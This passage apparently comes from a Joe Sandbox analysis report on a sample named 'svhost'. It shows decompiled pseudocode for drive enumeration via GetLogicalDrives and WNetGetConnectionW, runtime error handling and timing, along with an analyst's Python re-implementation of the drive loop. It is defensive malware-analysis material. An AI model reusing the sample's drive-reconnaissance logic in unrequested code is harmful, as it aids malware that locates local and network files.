                                      					_t91 = _t54 & 0x000000ff;
                                      					if((_t54 & 0x000000ff) != 0) {
                                      						_t103 = 0x00000001 << _v68 & _v80;
                                      						if((0x00000001 << _v68 & _v80) == 0) {
                                      							_v72 = _v64;
                                      							_t60 = E00E51BB0( &_v88,  &_v72,  &_v70);
                                      							_push(_t60[1]);
                                      							_t91 =  *_t60;
                                      							E00E66E90( &_v60, _t95, _t96, _t103,  *_t60);
                                      							E00E66920( &_v60, L":\\");
                                      							_t64 = E00E51650( &_v60);
                                      							_t99 = _t99 + 4;
                                      							E00E61E50( &_v36, _t64);
                                      						}
                                      					}
                                      					E00E57B40( &_v60);
                                      					_v68 = _v68 + 1;
                                      				}
                                      				E00E57460(_a4, E00E51650( &_v36));
                                      				E00E578B0( &_v36);
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t97;
                                      				return E00E89A35(_t66, _v20 ^ _t97, _t91, _t95, _t96);
                                      			}

                                      Instruction addresses for this listing (the per-statement address column was lost in extraction): 0x00e6c770 to 0x00e6c8a6

                                      APIs
                                      • GetLogicalDrives.KERNEL32 ref: 00E6C7B9
                                        • Part of subcall function 00E6C8B0: WNetGetConnectionW.MPR(00EC0E50,00000000,00000000), ref: 00E6C92F
                                        • Part of subcall function 00E6C8B0: task.LIBCPMTD ref: 00E6C964
                                      • std::ios_base::good.LIBCPMTD ref: 00E6C7FD
                                      • _Smanip.LIBCPMTD ref: 00E6C82B
                                      • task.LIBCPMTD ref: 00E6C864
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$ConnectionDrivesLogicalSmanipstd::ios_base::good
                                      • String ID:
                                      • API String ID: 280476529-0
                                      • Opcode ID: 8bd4143eb50d88940f10e2f241a6c14827442e7aefec6dc0cdf9b0d7af0eb5c0
                                      • Instruction ID: 24c1107daa7696564d578e3aef6038611efd53974520ae0029b0e5441017537a
                                      • Opcode Fuzzy Hash: 8bd4143eb50d88940f10e2f241a6c14827442e7aefec6dc0cdf9b0d7af0eb5c0
                                      • Instruction Fuzzy Hash: 70313CB1C10118DBCB08EFA4EC51AEEB7B4FF54744F405529F80277291EB34AA09CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%
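
The two listings above (E00E66BA0 and E00E6C770) share one drive-enumeration loop: GetLogicalDrives() returns a 26-bit mask, the counter runs from 0 to 0x19, the letter is formed as 0x41 + counter, a subcall (E00E66CF0 / E00E6C8B0) queries WNetGetConnectionW for that letter, and the root "X:\" is appended to a string stream when the mask bit is set (first variant) or clear (second variant). The block below is an added example written for this report, not code from the sample or from Joe Sandbox; it re-implements that loop so an analyst can check which roots each variant selects. The split into "local" and "network" drives, the function names, and the sample mask and mapped-drive table are assumptions and constructed input, not values from the report.

```python
# Added example (not sample or Joe Sandbox code): re-implementation of the drive loop in
# E00E66BA0 / E00E6C770. The local/network split is our reading of how the sample uses
# the WNetGetConnectionW result, not something the report states.
import ctypes
import sys

LETTER_COUNT = 0x1A          # loop bound in the decompiled code: 26 letters, A..Z
NO_ERROR = 0                 # WNetGetConnectionW success code


def roots_from_mask(mask, present=True):
    """Mirror the loop: bit i of the GetLogicalDrives mask <-> letter chr(0x41 + i).

    present=True  keeps letters whose bit is set   (the E00E66BA0 condition)
    present=False keeps letters whose bit is clear (the E00E6C770 condition)
    """
    return [chr(0x41 + i) + ":\\"
            for i in range(LETTER_COUNT)
            if bool((1 << i) & mask) == present]


def classify_drives(mask, remote_name_of):
    """Split the present letters into local roots and mapped network roots.

    remote_name_of(local_name) stands in for WNetGetConnectionW: it returns the UNC
    remote name for a mapped drive letter such as "Z:" and None otherwise.
    """
    local, network = [], []
    for root in roots_from_mask(mask, present=True):
        remote = remote_name_of(root[:2])        # "Z:\\" -> "Z:" (the lpLocalName form)
        if remote is not None:
            network.append((root, remote))
        else:
            local.append(root)
    return {"local": local, "network": network}


# Constructed sample input (not from the report): C:, D: and Z: are present in the mask,
# and Z: is a mapped drive that WNetGetConnectionW would resolve to a UNC path.
SAMPLE_MASK = (1 << 2) | (1 << 3) | (1 << 25)          # 0x0200000C
SAMPLE_REMOTE_NAMES = {"Z:": r"\\fileserver\share"}


def classify_drives_live():
    """Windows only: run the same classification against the real Win32 APIs."""
    if sys.platform != "win32":
        raise OSError("classify_drives_live needs the Win32 API (kernel32/mpr)")
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    mpr = ctypes.WinDLL("mpr", use_last_error=True)
    kernel32.GetLogicalDrives.restype = ctypes.c_uint32
    mpr.WNetGetConnectionW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p,
                                       ctypes.POINTER(ctypes.c_uint32)]
    mpr.WNetGetConnectionW.restype = ctypes.c_uint32

    def remote_name_of(local_name):
        buf = ctypes.create_unicode_buffer(1024)
        size = ctypes.c_uint32(len(buf))
        if mpr.WNetGetConnectionW(local_name, buf, ctypes.byref(size)) == NO_ERROR:
            return buf.value
        return None                             # ERROR_NOT_CONNECTED etc.: not a mapped drive

    return classify_drives(kernel32.GetLogicalDrives(), remote_name_of)


if __name__ == "__main__":
    result = classify_drives(SAMPLE_MASK, SAMPLE_REMOTE_NAMES.get)
    print("local  :", result["local"])          # ['C:\\', 'D:\\']
    print("network:", result["network"])        # [('Z:\\', '\\\\fileserver\\share')]
    print("E00E6C770 variant emits:", roots_from_mask(SAMPLE_MASK, present=False))
```

Run on a Windows analysis host, classify_drives_live() reports what the sample would see at the same point; elsewhere the pure-logic functions can be driven with a constructed mask and a dictionary standing in for WNetGetConnectionW, which is enough to confirm that the first variant walks the drives that exist while the second collects the 23 unused letters.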

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 7a4d0bbf632b63de7770933346468ce0da34ce020b4d22cc388b2f9c1d4a27d9
                                      • Instruction ID: e02f0d0a0a803afcdfe5e0ab8deb619dfa7d547ed469c2a1dda9200de5853218
                                      • Opcode Fuzzy Hash: 7a4d0bbf632b63de7770933346468ce0da34ce020b4d22cc388b2f9c1d4a27d9
                                      • Instruction Fuzzy Hash: EC41B8B4D00209AFCB04DF94D491AEEBBF5AF88341F14D56AE816BB351E730AA45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 6c302b82ee613e93955777c8b02cdc8a70f21b5de212fd333485caac3266a188
                                      • Instruction ID: 90c5abc02159e1d50f40622daf152fd814041798737ee6302575faa8cb867834
                                      • Opcode Fuzzy Hash: 6c302b82ee613e93955777c8b02cdc8a70f21b5de212fd333485caac3266a188
                                      • Instruction Fuzzy Hash: 3541BBB4D00208AFCB04DF94D591AEEBBF5AF88341F14D56AE916BB350E730AA05CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 79a7841de103d1e86cd7c54491699b0b3544210ebe9022495da6d1fb9a3e187b
                                      • Instruction ID: e1925665ab2537e41326e1130db2ac23fd6feb1a732ac62fe67330386a571709
                                      • Opcode Fuzzy Hash: 79a7841de103d1e86cd7c54491699b0b3544210ebe9022495da6d1fb9a3e187b
                                      • Instruction Fuzzy Hash: 9E419B75D00209AFCB08DF94D491AEEBBF5AF88341F14D56AE816BB351D730AA45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EA5007(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                      				intOrPtr _t14;
                                      				intOrPtr _t15;
                                      				intOrPtr _t17;
                                      				intOrPtr _t36;
                                      				intOrPtr* _t38;
                                      				intOrPtr _t39;
                                      
                                      				_t38 = _a4;
                                      				if(_t38 != 0) {
                                      					__eflags =  *_t38;
                                      					if( *_t38 != 0) {
                                      						_t14 = E00EB2838(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
                                      						__eflags = _t14;
                                      						if(__eflags != 0) {
                                      							_t36 = _a8;
                                      							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
                                      							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
                                      								L10:
                                      								_t15 = E00EB2838(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
                                      								__eflags = _t15;
                                      								if(__eflags != 0) {
                                      									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
                                      									_t17 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									E00EA5F21(GetLastError());
                                      									_t17 =  *((intOrPtr*)(E00EA5F57(__eflags)));
                                      								}
                                      								L13:
                                      								L14:
                                      								return _t17;
                                      							}
                                      							_t17 = E00EA5122(_t36, _t14);
                                      							__eflags = _t17;
                                      							if(_t17 != 0) {
                                      								goto L13;
                                      							}
                                      							goto L10;
                                      						}
                                      						E00EA5F21(GetLastError());
                                      						_t17 =  *((intOrPtr*)(E00EA5F57(__eflags)));
                                      						goto L14;
                                      					}
                                      					_t39 = _a8;
                                      					__eflags =  *((intOrPtr*)(_t39 + 0xc));
                                      					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                      						L5:
                                      						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
                                      						_t17 = 0;
                                      						 *((intOrPtr*)(_t39 + 0x10)) = 0;
                                      						goto L14;
                                      					}
                                      					_t17 = E00EA5122(_t39, 1);
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						goto L14;
                                      					}
                                      					goto L5;
                                      				}
                                      				E00EA51A7(_a8);
                                      				return 0;
                                      			}

                                      Instruction addresses for this listing (the per-statement address column was lost in extraction): 0x00ea500d to 0x00ea50ca

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 56%
                                      			E00E72059(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				signed int _v8;
                                      				char _v24;
                                      				intOrPtr* _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t22;
                                      				void* _t49;
                                      				intOrPtr _t51;
                                      				intOrPtr _t60;
                                      				signed int _t62;
                                      
                                      				_t58 = __edx;
                                      				_t22 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t22 ^ _t62;
                                      				_t60 = _a12;
                                      				_t59 = _a8;
                                      				_v28 = _a4;
                                      				_v36 = _t60;
                                      				_v32 = E00E60C40(_a8);
                                      				_pop(_t49);
                                      				if(_t60 != 0) {
                                      					E00E72399(_t49, __edx,  &_v24, 1);
                                      					E00E71E3F(_t59);
                                      					_t61 =  *((intOrPtr*)( *_v28 + 4));
                                      					 *0xec4320(_v32, E00E7227F(_v36,  &_v24));
                                      					_t51 = _v28;
                                      					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4))))() == 0) {
                                      						E00E72399(_t51, _t58,  &_v24, 1);
                                      						if(E00E7227F(_v36,  &_v24) == 0) {
                                      							_push(2);
                                      							_pop(0);
                                      						}
                                      					}
                                      				} else {
                                      					E00E71E3F(_t59);
                                      					_t61 =  *((intOrPtr*)( *_v28));
                                      					 *0xec4320(_v32);
                                      					 *((intOrPtr*)( *((intOrPtr*)( *_v28))))();
                                      				}
                                      				E00E71EC0(_t59);
                                      				return E00E89A35(0, _v8 ^ _t62, _t58, _t59, _t61);
                                      			}

                                      Similarity
                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                      • API String ID: 531285432-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E00E51820(void* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				char _v56;
                                      				char _v64;
                                      				signed int _t31;
                                      				intOrPtr _t59;
                                      				intOrPtr _t60;
                                      				intOrPtr _t61;
                                      				signed int _t64;
                                      
                                      				_t59 = __edx;
                                      				_push(0xffffffff);
                                      				_push(0xebfd50);
                                      				_push( *[fs:0x0]);
                                      				_t31 =  *0xeef074; // 0x221cac15
                                      				_push(_t31 ^ _t64);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v24 = E00E72268(__ecx);
                                      				_v20 = _t59;
                                      				_v32 = E00E72251(__ecx);
                                      				_v28 = _t59;
                                      				_t60 = _v28;
                                      				_v40 = E00E8A5E0(E00EBF380(_v32, _t60, _v24, _v20), _t60, 0x3b9aca00, 0);
                                      				_v36 = _t60;
                                      				_t61 = _v24;
                                      				_v48 = E00EBF380(E00E8A5E0(E00EBF430(_v32, _v28, _t61, _v20), _t61, 0x3b9aca00, 0), _t61, _v24, _v20);
                                      				_v44 = _t61;
                                      				asm("adc eax, [ebp-0x28]");
                                      				_v56 = _v40 + _v48;
                                      				_v52 = _v36;
                                      				E00E57870(_a4, E00E51900( &_v64,  &_v56));
                                      				 *[fs:0x0] = _v16;
                                      				return _a4;
                                      			}

                                      APIs
                                        • Part of subcall function 00E72268: QueryPerformanceFrequency.KERNEL32(00E5184A,?,?,?,00E5184A,221CAC15), ref: 00E72271
                                        • Part of subcall function 00E72251: QueryPerformanceCounter.KERNEL32(00E51855,?,?,?,00E51855,221CAC15), ref: 00E7225A
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5186B
                                      • __allrem.LIBCMT ref: 00E51894
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E518B1
                                      • DName::DName.LIBCMTD ref: 00E518D5
                                      Similarity
                                      • API ID: PerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$CounterFrequencyNameName::__allrem
                                      • API String ID: 2520107669-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E00EB0EFC(void* __ecx, void* __edx) {
                                      				void* __ebx;
                                      				void* __esi;
                                      				intOrPtr _t2;
                                      				long _t3;
                                      				intOrPtr _t5;
                                      				long _t6;
                                      				intOrPtr _t9;
                                      				long _t10;
                                      				signed int _t39;
                                      				signed int _t40;
                                      				void* _t43;
                                      				void* _t49;
                                      				signed int _t51;
                                      				signed int _t53;
                                      				signed int _t54;
                                      				long _t56;
                                      				long _t60;
                                      				long _t61;
                                      				void* _t65;
                                      
                                      				_t49 = __edx;
                                      				_t43 = __ecx;
                                      				_t60 = GetLastError();
                                      				_t2 =  *0xeef2c0; // 0x6
                                      				_t67 = _t2 - 0xffffffff;
                                      				if(_t2 == 0xffffffff) {
                                      					L6:
                                      					_t3 = E00EB163C(__eflags, _t2, 0xffffffff);
                                      					__eflags = _t3;
                                      					if(_t3 == 0) {
                                      						goto L3;
                                      					} else {
                                      						_t51 = E00EB04C2(1, 0x364);
                                      						_pop(_t43);
                                      						__eflags = _t51;
                                      						if(__eflags != 0) {
                                      							__eflags = E00EB163C(__eflags,  *0xeef2c0, _t51);
                                      							if(__eflags != 0) {
                                      								E00EB0D2A(_t51, 0xef373c);
                                      								E00EB051F(0);
                                      								_t65 = _t65 + 0xc;
                                      								goto L13;
                                      							} else {
                                      								_t39 = 0;
                                      								E00EB163C(__eflags,  *0xeef2c0, 0);
                                      								_push(_t51);
                                      								goto L9;
                                      							}
                                      						} else {
                                      							_t39 = 0;
                                      							__eflags = 0;
                                      							E00EB163C(0,  *0xeef2c0, 0);
                                      							_push(0);
                                      							L9:
                                      							E00EB051F();
                                      							_pop(_t43);
                                      							goto L4;
                                      						}
                                      					}
                                      				} else {
                                      					_t51 = E00EB15FD(_t67, _t2);
                                      					if(_t51 == 0) {
                                      						_t2 =  *0xeef2c0; // 0x6
                                      						goto L6;
                                      					} else {
                                      						if(_t51 != 0xffffffff) {
                                      							L13:
                                      							_t39 = _t51;
                                      						} else {
                                      							L3:
                                      							_t39 = 0;
                                      							L4:
                                      							_t51 = _t39;
                                      						}
                                      					}
                                      				}
                                      				SetLastError(_t60);
                                      				asm("sbb edi, edi");
                                      				_t53 =  ~_t51 & _t39;
                                      				if(_t53 == 0) {
                                      					E00EA59A0(_t39, _t43, _t49, _t60);
                                      					asm("int3");
                                      					asm("int3");
                                      					_t5 =  *0xeef2c0; // 0x6
                                      					_push(_t60);
                                      					__eflags = _t5 - 0xffffffff;
                                      					if(__eflags == 0) {
                                      						L22:
                                      						_t6 = E00EB163C(__eflags, _t5, 0xffffffff);
                                      						__eflags = _t6;
                                      						if(_t6 == 0) {
                                      							goto L31;
                                      						} else {
                                      							_t60 = E00EB04C2(1, 0x364);
                                      							_pop(_t43);
                                      							__eflags = _t60;
                                      							if(__eflags != 0) {
                                      								__eflags = E00EB163C(__eflags,  *0xeef2c0, _t60);
                                      								if(__eflags != 0) {
                                      									E00EB0D2A(_t60, 0xef373c);
                                      									E00EB051F(0);
                                      									_t65 = _t65 + 0xc;
                                      									goto L29;
                                      								} else {
                                      									E00EB163C(__eflags,  *0xeef2c0, _t21);
                                      									_push(_t60);
                                      									goto L25;
                                      								}
                                      							} else {
                                      								E00EB163C(__eflags,  *0xeef2c0, _t20);
                                      								_push(_t60);
                                      								L25:
                                      								E00EB051F();
                                      								_pop(_t43);
                                      								goto L31;
                                      							}
                                      						}
                                      					} else {
                                      						_t60 = E00EB15FD(__eflags, _t5);
                                      						__eflags = _t60;
                                      						if(__eflags == 0) {
                                      							_t5 =  *0xeef2c0; // 0x6
                                      							goto L22;
                                      						} else {
                                      							__eflags = _t60 - 0xffffffff;
                                      							if(_t60 == 0xffffffff) {
                                      								L31:
                                      								E00EA59A0(_t39, _t43, _t49, _t60);
                                      								asm("int3");
                                      								_push(_t39);
                                      								_push(_t60);
                                      								_push(_t53);
                                      								_t61 = GetLastError();
                                      								_t9 =  *0xeef2c0; // 0x6
                                      								__eflags = _t9 - 0xffffffff;
                                      								if(__eflags == 0) {
                                      									L38:
                                      									_t10 = E00EB163C(__eflags, _t9, 0xffffffff);
                                      									__eflags = _t10;
                                      									if(_t10 == 0) {
                                      										goto L35;
                                      									} else {
                                      										_t54 = E00EB04C2(1, 0x364);
                                      										__eflags = _t54;
                                      										if(__eflags != 0) {
                                      											__eflags = E00EB163C(__eflags,  *0xeef2c0, _t54);
                                      											if(__eflags != 0) {
                                      												E00EB0D2A(_t54, 0xef373c);
                                      												E00EB051F(0);
                                      												goto L45;
                                      											} else {
                                      												_t40 = 0;
                                      												E00EB163C(__eflags,  *0xeef2c0, 0);
                                      												_push(_t54);
                                      												goto L41;
                                      											}
                                      										} else {
                                      											_t40 = 0;
                                      											__eflags = 0;
                                      											E00EB163C(0,  *0xeef2c0, 0);
                                      											_push(0);
                                      											L41:
                                      											E00EB051F();
                                      											goto L36;
                                      										}
                                      									}
                                      								} else {
                                      									_t54 = E00EB15FD(__eflags, _t9);
                                      									__eflags = _t54;
                                      									if(__eflags == 0) {
                                      										_t9 =  *0xeef2c0; // 0x6
                                      										goto L38;
                                      									} else {
                                      										__eflags = _t54 - 0xffffffff;
                                      										if(_t54 != 0xffffffff) {
                                      											L45:
                                      											_t40 = _t54;
                                      										} else {
                                      											L35:
                                      											_t40 = 0;
                                      											__eflags = 0;
                                      											L36:
                                      											_t54 = _t40;
                                      										}
                                      									}
                                      								}
                                      								SetLastError(_t61);
                                      								asm("sbb edi, edi");
                                      								_t56 =  ~_t54 & _t40;
                                      								__eflags = _t56;
                                      								return _t56;
                                      							} else {
                                      								L29:
                                      								__eflags = _t60;
                                      								if(_t60 == 0) {
                                      									goto L31;
                                      								} else {
                                      									return _t60;
                                      								}
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					return _t53;
                                      				}
                                      			}

                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10b0
                                      0x00eb10b5
                                      0x00eb10b6
                                      0x00eb10b6
                                      0x00000000
                                      0x00eb10bb
                                      0x00eb10a5
                                      0x00eb106b
                                      0x00eb1071
                                      0x00eb1073
                                      0x00eb1075
                                      0x00eb1082
                                      0x00000000
                                      0x00eb1077
                                      0x00eb1077
                                      0x00eb107a
                                      0x00eb10f4
                                      0x00eb10f4
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107a
                                      0x00eb1075
                                      0x00eb10f7
                                      0x00eb10ff
                                      0x00eb1101
                                      0x00eb1101
                                      0x00eb1108
                                      0x00eb0fd6
                                      0x00eb1046
                                      0x00eb1046
                                      0x00eb1048
                                      0x00000000
                                      0x00eb104a
                                      0x00eb104d
                                      0x00eb104d
                                      0x00eb1048
                                      0x00eb0fd4
                                      0x00eb0fcf
                                      0x00eb0fad
                                      0x00eb0fb2
                                      0x00eb0fb2

                                      APIs
                                      • GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                      • _free.LIBCMT ref: 00EB0F5E
                                      • _free.LIBCMT ref: 00EB0F94
                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00E5C660(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				intOrPtr* _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				signed int _t31;
                                      				signed int _t32;
                                      				intOrPtr* _t40;
                                      				signed char _t42;
                                      				signed int _t73;
                                      
                                      				_t72 = __esi;
                                      				_t71 = __edi;
                                      				_t51 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0958);
                                      				_push( *[fs:0x0]);
                                      				_t31 =  *0xeef074; // 0x221cac15
                                      				_t32 = _t31 ^ _t73;
                                      				_v20 = _t32;
                                      				_push(_t32);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v32 = __ecx;
                                      				E00E515C0( &_v28, 8);
                                      				E00E57830( &_v28, _v32 + 0x14);
                                      				_v8 = 0;
                                      				_t69 =  *_v32;
                                      				if(( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0xc))))() & 0x000000ff) == 0) {
                                      					_t40 = E00E53840( &_v48, _v32);
                                      					_t69 =  &_v28;
                                      					_t42 = E00E5DAE0(__ebx, _v32 + 0x44, __edi, __esi, __eflags, __fp0,  &_v28, _a4,  *_t40);
                                      					__eflags = _t42 & 0x000000ff;
                                      					if((_t42 & 0x000000ff) == 0) {
                                      						_v44 = 1;
                                      						_v8 = 0xffffffff;
                                      						E00E577E0();
                                      					} else {
                                      						_v40 = 0;
                                      						_v8 = 0xffffffff;
                                      						E00E577E0();
                                      					}
                                      				} else {
                                      					_v36 = 2;
                                      					_v8 = 0xffffffff;
                                      					E00E577E0();
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t51, _v20 ^ _t73, _t69, _t71, _t72);
                                      			}

                                      Yara matches
                                      Similarity
                                      • API ID: ~unique_lock$unique_lock
                                      • String ID:
                                      • API String ID: 1747051668-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 48%
                                      			E00E53510(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
